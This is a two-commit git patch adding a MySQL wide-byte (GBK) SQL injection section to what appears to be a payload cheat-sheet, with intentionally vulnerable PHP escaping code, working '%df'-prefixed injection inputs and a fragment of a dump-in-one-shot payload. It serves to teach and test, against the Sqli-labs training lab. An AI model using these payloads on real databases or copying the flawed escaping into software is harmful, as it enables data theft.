From 9574af9dd1f69c920dab5849bf710f30566c4ce9 Mon Sep 17 00:00:00 2001
From: Mane
Date: Wed, 13 Sep 2023 08:13:36 -0700
Subject: [PATCH 1/2] Update MySQL Injection.md

Add MYSQL Wide byte injection, it can test in Sqli-labs Less-32
---
 SQL Injection/MySQL Injection.md | 33 ++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 5d19b433..e8968416 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -22,6 +22,7 @@
 * [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
 * [Using conditional statements](#using-conditional-statements)
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
+* [MYSQL Wide byte injection](#mysql-wide-byte-injection)
 * [MYSQL Current queries](#mysql-current-queries)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
 * [MYSQL Write a shell](#mysql-write-a-shell)
@@ -438,6 +439,38 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51
 
 (select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
 ```
+
+## MYSQL Wide byte injection
+
+Wide byte injection works only when mysql's encoding is set to gbk, a small php example:
+
+```php
+function check_addslashes($string)
+{
+ $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
+ $string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
+ $string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
+
+ return $string;
+}
+
+$id=check_addslashes($_GET['id']);
+mysql_query("SET NAMES gbk");
+$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+print_r(mysql_error());
+```
+
+PHP will check quote and add backslash, like translates `'` into `\'`.
+
+when input: `?id=1'` --> `SELECT * FROM users WHERE id='1\'' LIMIT 0,1`, not working.
+
+But if add `%df` like `?id=1%df'` --> `SELECT * FROM users WHERE id='1運\' LIMIT 0,1`, it will work
+
+Because that way can one escape `'`,
+
+So, it can be: `?id=1%df' and 1=1 --+` --> `SELECT * FROM users WHERE id='1運\' and 1=1 --+ LIMIT 0,1`, it can be inject.
+
+
 ## MYSQL Current queries
 
 This table can list all operations that DB is performing at the moment.

From 811d71026fa18c98a374c17a4d3586c762a06a6b Mon Sep 17 00:00:00 2001
From: Mane
Date: Wed, 13 Sep 2023 08:33:03 -0700
Subject: [PATCH 2/2] Update MySQL Injection.md

fix typo
---
 SQL Injection/MySQL Injection.md | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index e8968416..54a352e4 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -442,7 +442,7 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51
 
 ## MYSQL Wide byte injection
 
-Wide byte injection works only when mysql's encoding is set to gbk, a small php example:
+Wide byte injection works only when mysql encoding is set to gbk, a small php example:
 
 ```php
 function check_addslashes($string)
@@ -462,13 +462,11 @@ print_r(mysql_error());
 
 PHP will check quote and add backslash, like translates `'` into `\'`.
 
-when input: `?id=1'` --> `SELECT * FROM users WHERE id='1\'' LIMIT 0,1`, not working.
+When input: `?id=1'` --> PHP add backslash --> `SELECT * FROM users WHERE id='1\'' LIMIT 0,1` --> not working.
 
-But if add `%df` like `?id=1%df'` --> `SELECT * FROM users WHERE id='1運\' LIMIT 0,1`, it will work
+But if add `%df`: `?id=1%df'` --> PHP add backslash --> `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1` --> ( `\` : `%5c`, `%df%5c` : `連` ) --> `SELECT * FROM users WHERE id='1連'' LIMIT 0,1` --> can escape `'`.
 
-Because that way can one escape `'`,
-
-So, it can be: `?id=1%df' and 1=1 --+` --> `SELECT * FROM users WHERE id='1運\' and 1=1 --+ LIMIT 0,1`, it can be inject.
+So, it can be: `?id=1%df' and 1=1 --+` --> PHP add backslash--> `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`, it can be inject.
 
 
 ## MYSQL Current queries